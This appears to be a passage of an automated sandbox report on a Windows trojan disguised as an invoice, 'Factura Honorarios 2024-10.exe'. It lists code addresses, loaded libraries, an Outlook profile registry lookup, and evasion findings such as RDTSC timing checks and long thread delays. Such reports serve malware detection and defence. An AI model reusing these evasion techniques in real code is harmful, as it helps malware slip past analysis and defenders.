Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD654A0 4_2_3AD654A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD622A0 4_2_3AD622A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD66440 4_2_3AD66440
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD63240 4_2_3AD63240
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD60040 4_2_3AD60040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD6EE48 4_2_3AD6EE48
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD66A70 4_2_3AD66A70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD64E60 4_2_3AD64E60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD61C60 4_2_3AD61C60
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD65E00 4_2_3AD65E00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD62C00 4_2_3AD62C00
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD60038 4_2_3AD60038
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD64820 4_2_3AD64820
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD61620 4_2_3AD61620
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD60FD0 4_2_3AD60FD0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD641D0 4_2_3AD641D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD657C0 4_2_3AD657C0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD625C0 4_2_3AD625C0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD641E0 4_2_3AD641E0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD60FE0 4_2_3AD60FE0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD65180 4_2_3AD65180
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD61F80 4_2_3AD61F80
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD66DA0 4_2_3AD66DA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD63BA0 4_2_3AD63BA0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD609A0 4_2_3AD609A0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD60350 4_2_3AD60350
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD66750 4_2_3AD66750
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD64B40 4_2_3AD64B40
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD61940 4_2_3AD61940
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD66760 4_2_3AD66760
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD63560 4_2_3AD63560
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD60360 4_2_3AD60360
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD64500 4_2_3AD64500
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD61300 4_2_3AD61300
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD66120 4_2_3AD66120
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD62F20 4_2_3AD62F20
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD71CF0 4_2_3AD71CF0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD78470 4_2_3AD78470
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7FB30 4_2_3AD7FB30
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7D8D0 4_2_3AD7D8D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7A6D0 4_2_3AD7A6D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7F4F0 4_2_3AD7F4F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD790F0 4_2_3AD790F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7C2F0 4_2_3AD7C2F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD704F9 4_2_3AD704F9
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD71CE0 4_2_3AD71CE0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7A090 4_2_3AD7A090
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7D290 4_2_3AD7D290
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD70E98 4_2_3AD70E98
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD70E89 4_2_3AD70E89
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7BCB0 4_2_3AD7BCB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD78AB0 4_2_3AD78AB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7EEB0 4_2_3AD7EEB0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD79A50 4_2_3AD79A50
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7CC50 4_2_3AD7CC50
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7CC41 4_2_3AD7CC41
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD70040 4_2_3AD70040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7E870 4_2_3AD7E870
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7B670 4_2_3AD7B670
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD71817 4_2_3AD71817
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD70011 4_2_3AD70011
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7C610 4_2_3AD7C610
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD79410 4_2_3AD79410
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7F810 4_2_3AD7F810
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7B030 4_2_3AD7B030
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7E230 4_2_3AD7E230
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD71828 4_2_3AD71828
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7F1D0 4_2_3AD7F1D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD709D0 4_2_3AD709D0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD78DD0 4_2_3AD78DD0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7BFD0 4_2_3AD7BFD0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7DBF0 4_2_3AD7DBF0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7A9F0 4_2_3AD7A9F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7B990 4_2_3AD7B990
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD78790 4_2_3AD78790
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7EB90 4_2_3AD7EB90
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7D5B0 4_2_3AD7D5B0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7A3B0 4_2_3AD7A3B0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD709BF 4_2_3AD709BF
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD71351 4_2_3AD71351
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7E550 4_2_3AD7E550
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7B350 4_2_3AD7B350
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD79D70 4_2_3AD79D70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7CF70 4_2_3AD7CF70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD71360 4_2_3AD71360
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD73360 4_2_3AD73360
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7AD10 4_2_3AD7AD10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7DF10 4_2_3AD7DF10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD70508 4_2_3AD70508
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7C930 4_2_3AD7C930
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD79730 4_2_3AD79730
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB1B50 4_2_3ADB1B50
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB3008 4_2_3ADB3008
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB36F0 4_2_3ADB36F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB1470 4_2_3ADB1470
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB2920 4_2_3ADB2920
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB0D88 4_2_3ADB0D88
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB2238 4_2_3ADB2238
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB1B3F 4_2_3ADB1B3F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB36E1 4_2_3ADB36E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB1460 4_2_3ADB1460
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB0A10 4_2_3ADB0A10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB09E1 4_2_3ADB09E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB2911 4_2_3ADB2911
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB2FFB 4_2_3ADB2FFB
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB0D79 4_2_3ADB0D79
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB2229 4_2_3ADB2229
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB0040 4_2_3ADB0040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB0011 4_2_3ADB0011
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AEA3BD0 4_2_3AEA3BD0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AEA9771 4_2_3AEA9771
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AEA0F74 4_2_3AEA0F74
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AEA2530 4_2_3AEA2530
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: String function: 00402B3A appears 51 times
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011954740.0000000037897000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Factura Honorarios 2024-10.exe
Source: Factura Honorarios 2024-10.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/10@5/5
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00404457 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404457
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_0040206A
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File created: C:\Program Files (x86)\shaw
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File created: C:\Users\user\AppData\Local\Temp\nsr45A1.tmp
Source: Factura Honorarios 2024-10.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Factura Honorarios 2024-10.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File read: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe
Source: unknown Process created: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe "C:\Users\user\Desktop\Factura Honorarios 2024-10.exe"
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process created: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe "C:\Users\user\Desktop\Factura Honorarios 2024-10.exe"
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: riched20.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: usp10.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: msls31.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Data Obfuscation

Source: Yara match File source: 00000004.00000002.2985431621.0000000001862000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2291538822.00000000053B2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_00169C30 push esp; retf 0019h 4_2_00169D55
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File created: C:\Users\user\AppData\Local\Temp\nsn497A.tmp\System.dll
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe API/Special instruction interceptor: Address: 5C66B5F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe API/Special instruction interceptor: Address: 2116B5F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe RDTSC instruction interceptor: First address: 5C2AF82 second address: 5C2AF82 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007EFC050C3965h 0x00000008 test ah, FFFFFF9Eh 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe RDTSC instruction interceptor: First address: 20DAF82 second address: 20DAF82 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007EFC0480B975h 0x00000008 test ah, FFFFFF9Eh 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Memory allocated: 120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Memory allocated: 379A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Memory allocated: 376B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599722 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599578 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599469 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599344 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598735 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598250 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598141 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598032 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597907 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597782 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597669 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597263 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597153 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596719 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595360 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 593985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 593860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 593735 Jump to behavior
